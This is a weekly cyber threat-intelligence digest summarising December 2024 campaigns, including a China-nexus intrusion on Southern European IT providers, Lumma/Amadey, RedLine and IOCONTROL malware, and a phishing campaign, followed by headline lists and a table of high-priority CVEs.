Operation Digital Eye targets IT service providers in Southern Europe via VSC tunnels
Between late June and mid-July 2024, SentinelLabs and Tinexta Cyber researchers observed a suspected China-nexus advanced persistent threat (APT) targeting large business-to-business IT service providers in Southern Europe. The activity, tracked as Operation Digital Eye, lasted three weeks and aimed to establish footholds in target networks and exert control over critical IT processes within the downstream compromised entities. The attackers used SQL injection to gain initial access, deployed a PHP-based webshell to establish a foothold and maintain persistence, conducted reconnaissance using third-party tools and built-in Windows utilities, and used the ‘CreateDump’ tool to steal credentials. The attackers then moved laterally across the internal network, primarily using Remote Desktop Protocol connections and pass-the-hash techniques, which involved the use of a custom version of Mimikatz.
Threat actors target manufacturing industry with Lumma Stealer and Amadey Bot
Cyble researchers identified a multi-stage campaign involving an LNK file disguised as a PDF file to target the manufacturing industry. The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma Stealer and Amadey Bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim’s machine. While the initial infection vector is unknown, the attack likely begins with a spear phishing email prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. Once executed, the LNK file triggers a command to launch multiple living-off-the-land binaries, such as an SSH, PowerShell, and mshta, to bypass security measures and remotely execute the next-stage payload, Lumma and Amadey.
RedLine stealer campaign targets Russian businesses via pirated software
Kaspersky researchers observed an ongoing RedLine infostealer campaign, active since January 2024, targeting Russian businesses using pirated corporate software. The threat actors target business process automation users by distributing a malicious version of the HPDxLIB activator that uses a self-signed certificate. The activator contains RedLine stealer, which is obfuscated using .NET Reactor and contains malicious code that is compressed and encrypted in multiple layers. The threat actors distribute the malicious activators via specialised Russian business ownership and accounting forums, often providing instructions on disabling security software to run the activator. The attackers then trick users into replacing a legitimate DLL library with a malicious one included in the activator, which loads a malicious library and runs RedLine stealer.
IOCONTROL malware targets IoT and OT devices in Israel and the US
Claroty researchers detailed IOCONTROL, a custom-built internet of things (IoT) and operational technology (OT) malware used by Iran-affiliated threat actors to target Israel and United States-based IoT and OT devices. Devices affected by the malware include IP cameras, routers, PLCs, HMIs, firewalls, and more. Impacted vendors include Baicells, D-Link, and Hikvision, among others. The malware has most recently been used by CyberAv3ngers, who is believed to be part of the Islamic Revolutionary Guard Corps Cyber Electronic Command. One of their attack waves specifically targeted Orpak and Gasboy fuel management systems, resulting in the compromise of about 200 gas stations in Israel and the US.
Global phishing campaign targets multiple industries to steal login credentials
Since July 2024, Group-IB researchers observed an ongoing email phishing campaign targeting the employees and associates of more than 30 businesses and organisations from 15 jurisdictions worldwide. More than 200 phishing links have been distributed to the victims as part of a scheme designed to obtain their login credentials. Targeted industries include manufacturing, government sectors, aerospace, finance, energy, telecommunications, and fashion. The campaign begins with phishing links that mimic trusted platforms used for document management and electronic signatures, such as Adobe and DocuSign, and prompt the recipients to click on a link to view and sign a document. The embedded document pretends to deliver an important PDF message impersonating Adobe InDesign, but instead includes a link that redirects victims to a phishing page.
Ransomware
Volume of blog posts by operators during the last week.
Lynx ransomware behind Electrica energy supplier cyberattackBleeping Computer – Dec 11 202412 Months of Ransomware – A Year in ReviewSilobreaker Blog – Dec 11 2024Head Mare Targets Russian Orgs with Hidden LNK Files, RansomwareThe Cyber Express – Dec 11 2024Ransomware attack cripples Wood County computer systemsToledo Blade – Dec 10 2024Dark Web Profile: Ymir Ransomware SOCRadar – Dec 09 2024Is KillSec3 Trying to Extort Victims Using Publicly Leaked Data?DataBreaches.net – Dec 08 2024A Technical Look At The New ‘Termite’ Ransomware That Hit Blue Yonder Cyble Blog – Dec 06 2024Exploration of Parano – Multiple Hacking Tools’ Capabilities CYFIRMA – Dec 04 2024
Financial Services
The Rise of Pig Butchering ScamsCyberint – Dec 11 2024AppLite: A New AntiDot Variant Targeting Mobile Employee DevicesZimperium Blog – Dec 10 2024$50 Million Radiant Capital Heist Blamed on North Korean HackersSecurityWeek RSS Feed – Dec 10 2024Meeten Malware: A Cross-Platform Threat to Crypto Wallets on macOS and WindowsCado Security – Dec 06 2024Ukrainian intelligence hackers disrupt Russia’s Gazprombank, source says.The Kyiv Independent – Dec 05 2024
Geopolitics
Secret Blizzard Targets Ukrainian Military with Custom MalwareInfosecurity Today – Dec 11 2024CERT-UA Warns of Phishing Attacks Targeting Ukraine’s Defense and Security ForceThe Hacker News – Dec 10 2024Romanian court annuls result of presidential election first roundBBC – Dec 06 2024Russian Hacktivists Increasingly Tamper with Energy and Water System ControlsCyble – Dec 06 2024Microsoft: Another Chinese cyberspy crew targeting US critical orgs ‘as of yesterday’The Register – Security – Dec 06 2024
High Priority Vulnerabilities
| Name | name | Software | Base Score |
Temp Score |
|---|---|---|---|---|
| CVE-2024-49138 | Windows | 7.8 | 7.5 | |
| Related: Microsoft Fixes 71 CVEs Including Actively Exploited Zero-Day | ||||
| CVE-2024-50623 | LexiCom | 8.8 | 3.4 | |
| Related: Cleo Vulnerability Exploitation Linked to Termite Ransomware Group | ||||
| CVE-2023-46604 | Enterprise Data Quality | 9.8 | 9.8 | |
| Related: Mauri Ransomware Leverages Apache ActiveMQ Vulnerability to Deploy CoinMiners | ||||
| CVE-2024-50498 | WP Query Console Plugin | 9.8 | 7.1 | |
| Related: Critical flaw in Hunk Companion plugin exploited to install vulnerable plugins | ||||
| CVE-2024-10905 | IdentityIQ | 10.0 | 9.4 | |
| Related: Maximum-severity flaw fixed in SailPoint IdentityIQ | ||||